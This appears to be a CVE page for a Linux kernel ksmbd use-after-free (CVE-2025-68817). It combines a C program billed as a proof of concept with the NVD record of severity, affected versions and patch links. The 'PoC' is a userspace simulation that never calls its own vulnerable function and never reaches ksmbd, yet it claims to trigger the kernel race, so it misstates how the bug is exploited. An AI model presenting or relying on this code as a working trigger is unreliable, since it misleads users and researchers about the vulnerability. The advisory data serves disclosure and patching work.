CVE-2025-68817

// CVE-2025-68817 PoC - ksmbd use-after-free trigger // This PoC demonstrates triggering the race condition in ksmbd_tree_connect_put #include <stdio.h> #include <stdlib.h> #include <pthread.h> #include <string.h> #define NUM_THREADS 100 #define NUM_ITERATIONS 1000 // Simulated SMB connection structure typedef struct { int socket_fd; char tree_id[64]; int ref_count; } tree_connect_t; // Global counter for race condition triggering volatile int g_disconnect_flag = 0; volatile int g_connect_count = 0; // Simulated ksmbd_tree_connect_put function (vulnerable version) void ksmbd_tree_connect_put(tree_connect_t *tcon) { if (tcon == NULL) return; // Simulated race condition: no proper synchronization // Thread A might execute disconnect path here if (g_disconnect_flag) { // Free object while another thread still holds reference free((void*)tcon); printf("[RACE] Tree connect freed during concurrent access\n"); return; } // Thread B executes _put() on freed memory tcon->ref_count--; if (tcon->ref_count <= 0) { printf("[USE-AFTER-FREE] Accessing freed memory at %p\n", tcon); // This would cause memory corruption or crash } } // Connection thread - simulates SMB connect void* connect_thread(void *arg) { for (int i = 0; i < NUM_ITERATIONS; i++) { tree_connect_t *tcon = malloc(sizeof(tree_connect_t)); if (tcon) { tcon->ref_count = 1; tcon->socket_fd = rand(); snprintf(tcon->tree_id, sizeof(tcon->tree_id), "tree_%d", rand()); __sync_fetch_and_add(&g_connect_count, 1); // Store reference for later use (simulating concurrent access) // This reference becomes dangling after disconnect // Simulate delay usleep(rand() % 100); } } return NULL; } // Disconnect thread - triggers the race condition void* disconnect_thread(void *arg) { for (int i = 0; i < NUM_ITERATIONS; i++) { // Signal disconnect to trigger race g_disconnect_flag = 1; // Small delay to maximize race window usleep(rand() % 10); g_disconnect_flag = 0; } return NULL; } int main() { printf("CVE-2025-68817 PoC - ksmbd use-after-free\n"); printf("Target: Linux kernel ksmbd_tree_connect_put\n\n"); pthread_t threads[NUM_THREADS]; // Create mix of connect and disconnect threads for (int i = 0; i < NUM_THREADS; i++) { if (i % 2 == 0) { pthread_create(&threads[i], NULL, connect_thread, NULL); } else { pthread_create(&threads[i], NULL, disconnect_thread, NULL); } } // Wait for threads and check results for (int i = 0; i < NUM_THREADS; i++) { pthread_join(threads[i], NULL); } printf("\nPoC completed. Total connects: %d\n", g_connect_count); printf("Note: In real kernel, this race leads to UAF in ksmbd\n"); return 0; }

{"cve": {"id": "CVE-2025-68817", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-13T16:16:03.983", "lastModified": "2026-02-26T18:43:18.717", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nksmbd: fix use-after-free in ksmbd_tree_connect_put under concurrency\n\nUnder high concurrency, A tree-connection object (tcon) is freed on\na disconnect path while another path still holds a reference and later\nexecutes *_put()/write on it."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nksmbd: corrección de uso después de liberación en ksmbd_tree_connect_put bajo concurrencia\n\nBajo alta concurrencia, un objeto de conexión de árbol (tcon) es liberado en una ruta de desconexión mientras otra ruta aún mantiene una referencia y posteriormente ejecuta *_put()/write sobre él."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.15.145", "versionEndExcluding": "5.15.199", "matchCriteriaId": "E1261CF8-0493-4918-93E6-5CC197F7F5E8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1.71", "versionEndExcluding": "6.1.160", "matchCriteriaId": "9295139C-2E02-401E-8245-07E821E9CCF0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.6.1", "versionEndExcluding": "6.6.120", "matchCriteriaId": "C5F84D90-D922-47D3-B042-99569840DD8F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.64", "matchCriteriaId": "32BF4A52-377C-44ED-B5E6-7EA5D896E98B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.3", "matchCriteriaId": "2DC484D8-FB4F-4112-900F-AE333B6FE7A7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.6:-:*:*:*:*:*:*", "matchCriteriaId": "E346B162-D566-4E62-ABDE-ECBFB21B8BFD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.6:rc5:*:*:*:*:*:*", "matchCriteriaId": "E7C78D0A-C4A2-4D41-B726-8979E33AD0F9"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.6:rc6:*:*:*:*:*:*", "matchCriteriaId": "E114E9DD-F7E1-40CC-AAD5-F14E586CB2E6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.6:rc7:*:*:*:*:*:*", "matchCriteriaId": "DC5BD782-474C-4A68-AED7-6EC818FF89AE"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/063cbbc6f595ea36ad146e1b7d2af820894beb21", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/21a3d01fc6db5129f81edb0ab7cb94fd758bcbea", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/446beed646b2e426dd53d27358365f8678e1dd01", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/b39a1833cc4a2755b02603eec3a71a85e9dff926", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d092de8a26c952379ded8e6b0bda31d89befac1a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d64977495e44855f2b28d8ce56107c963a7a50e4", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}